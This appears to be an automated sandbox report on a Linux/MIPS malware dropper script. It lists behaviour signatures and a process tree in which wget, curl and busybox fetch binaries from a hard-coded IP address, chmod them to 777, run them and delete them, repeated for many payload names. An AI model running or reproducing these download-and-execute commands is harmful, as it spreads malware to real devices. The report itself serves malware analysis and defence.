debian9-mipsbe-20240611-en
Max time kernel
76s
Max time network
78s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
Processes
/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh
[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
